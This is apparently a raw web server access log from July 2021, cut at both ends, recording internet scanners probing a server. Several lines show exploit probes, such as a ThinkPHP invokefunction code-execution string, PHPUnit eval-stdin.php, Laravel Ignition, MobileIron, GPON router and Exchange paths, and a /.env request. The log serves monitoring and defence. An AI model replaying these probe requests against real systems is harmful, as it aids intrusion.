10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:53 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:54 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:55 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:55 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:57 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [23/Jul/2021:17:28:58 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:48:30 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:17:48:30 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:19:05:42 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Jul/2021:20:53:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 83.41.123.192] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Jul/2021:22:47:31 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.102] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:01:17:28 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [24/Jul/2021:01:44:39 +0000] 444 - GET https 64.22.21.87 "/" [Client 27.115.124.99] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:01:44:44 +0000] 400 - - https localhost "-" [Client 27.115.124.10] [Length 154] [Gzip -] "-" "-" [24/Jul/2021:01:44:45 +0000] 400 - - http localhost "-" [Client 27.115.124.75] [Length 154] [Gzip -] "-" "-" [24/Jul/2021:01:44:55 +0000] 400 - - https localhost "-" [Client 27.115.124.36] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:01:44:55 +0000] 444 - GET https 64.22.21.87 "/favicon.ico" [Client 27.115.124.37] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Jul/2021:01:44:56 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 27.115.124.36] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Jul/2021:01:44:57 +0000] 444 - GET https 64.22.21.87 "/sitemap.xml" [Client 27.115.124.100] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [24/Jul/2021:02:10:39 +0000] 444 - GET https 64.22.21.87 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [24/Jul/2021:02:14:40 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [24/Jul/2021:02:46:22 +0000] 444 - GET https 64.22.21.87 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [24/Jul/2021:03:42:23 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.221.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:05:17:27 +0000] 444 - GET https 64.22.21.87 "/" [Client 216.218.206.68] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:05:45:57 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Jul/2021:05:51:23 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [24/Jul/2021:06:19:00 +0000] 444 - OPTIONS https 64.22.21.87 "/" [Client 209.141.38.163] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "-" [24/Jul/2021:08:33:45 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.12] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Jul/2021:09:42:31 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.93] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:11:54:23 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:24 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:24 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:24 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:26 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:29 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:29 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [24/Jul/2021:11:54:30 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:30 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:33 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:11:54:33 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [24/Jul/2021:13:16:34 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.215.21] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:15:55:48 +0000] 444 - GET https 64.22.21.87 "/web/index.html" [Client 92.118.160.1] [Length 0] [Gzip -] "Go http package" "-" [24/Jul/2021:16:20:51 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 37.229.198.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [24/Jul/2021:16:33:36 +0000] 444 - GET https 64.22.21.87 "/" [Client 164.52.24.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:00:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [24/Jul/2021:17:52:11 +0000] 444 - GET https win5858.in "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:17:56:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.142.125.38] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:17:56:52 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.38] [Length 252] [Gzip -] "-" "-" [24/Jul/2021:17:56:52 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.38] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Jul/2021:21:56:37 +0000] 400 - GET http 64.22.21.87 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [24/Jul/2021:22:49:16 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.210.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Jul/2021:23:06:53 +0000] 400 - GET https v5.bkqb.xyz "/" [Client 194.163.134.133] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:23:26:54 +0000] 444 - GET https 64.22.21.87 "/" [Client 74.120.14.37] [Length 0] [Gzip -] "-" "-" [24/Jul/2021:23:26:55 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.37] [Length 252] [Gzip -] "-" "-" [24/Jul/2021:23:26:55 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [25/Jul/2021:00:31:17 +0000] 444 - GET https 64.22.21.87 "/" [Client 143.255.58.39] [Length 0] [Gzip -] "Safari/3.0 (Macintosh 4.1; rv:2.0.1) Gecko/20100101 Firefox/4.3.3" "-" [25/Jul/2021:00:36:16 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.152] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:03:53:11 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:11 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:13 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:13 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:14 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:16 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [25/Jul/2021:03:53:16 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:17 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:19 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:19 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:03:53:20 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Jul/2021:05:56:55 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.221.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Jul/2021:06:43:54 +0000] 444 - GET https 87.21.22.64.aeneasdsl.com "/" [Client 124.126.78.166] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [25/Jul/2021:09:43:58 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.198.52] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Jul/2021:10:06:18 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Jul/2021:15:29:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Jul/2021:15:29:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Jul/2021:15:29:45 +0000] 444 - GET https 64.22.21.87 "/" [Client 82.221.105.6] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Jul/2021:15:29:53 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:29:56 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:29:57 +0000] 400 - - https localhost "-" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:30:02 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:30:03 +0000] 444 - GET https 64.22.21.87 "/sitemap.xml" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:30:05 +0000] 444 - GET https 64.22.21.87 "/.well-known/security.txt" [Client 82.221.105.6] [Length 0] [Gzip -] "-" "-" [25/Jul/2021:15:32:10 +0000] 444 - GET https 64.22.21.87 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:00:28 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Jul/2021:17:41:21 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.220.196] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Jul/2021:19:28:38 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Jul/2021:21:05:46 +0000] 400 - GET http 64.22.21.87 "/manager/text/list" [Client 192.241.223.178] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Jul/2021:21:24:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Jul/2021:22:49:30 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.223.185] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Jul/2021:23:50:10 +0000] 400 - GET http 64.22.21.87 "/manager/html" [Client 192.241.196.220] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Jul/2021:00:14:37 +0000] 444 - GET https 64.22.21.87 "/" [Client 64.62.197.92] [Length 0] [Gzip -] "-" "-" [26/Jul/2021:02:01:53 +0000] 400 - GET https www.05pr.com "/" [Client 209.159.154.178] [Length 0] [Gzip -] "-" "-" [26/Jul/2021:02:20:23 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Jul/2021:04:11:34 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Jul/2021:05:15:28 +0000] 444 - GET https 64.22.21.87 "/" [Client 54.176.223.86] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [26/Jul/2021:06:57:55 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:07:00:13 +0000] 400 - GET https localhost "/PSiP" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:07:42:40 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [26/Jul/2021:07:54:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Jul/2021:09:34:36 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:09:34:36 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:09:34:36 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:09:45:16 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.145] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Jul/2021:10:57:41 +0000] 444 - GET https 64.22.21.87 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [26/Jul/2021:10:57:41 +0000] 400 - GET http 64.22.21.87 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [26/Jul/2021:11:27:16 +0000] 444 - GET https 64.22.21.87 "/" [Client 23.129.64.150] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [26/Jul/2021:11:27:24 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.131] [Length 0] [Gzip -] "-" "-" [26/Jul/2021:11:27:25 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 45.129.56.200] [Length 0] [Gzip -] "-" "-" [26/Jul/2021:11:27:26 +0000] 400 - - https localhost "-" [Client 45.129.56.200] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:11:36:51 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Jul/2021:12:45:03 +0000] 444 - GET https 64.22.21.87 "/" [Client 74.120.14.56] [Length 0] [Gzip -] "-" "-" [26/Jul/2021:12:45:04 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.56] [Length 252] [Gzip -] "-" "-" [26/Jul/2021:12:45:04 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [26/Jul/2021:12:53:27 +0000] 400 - GET http localhost "/" [Client 45.55.59.56] [Length 252] [Gzip -] "-" "-" [26/Jul/2021:13:08:41 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:13:37:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:13:37:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:13:37:43 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [26/Jul/2021:13:50:07 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:07 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Jul/2021:13:50:09 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] 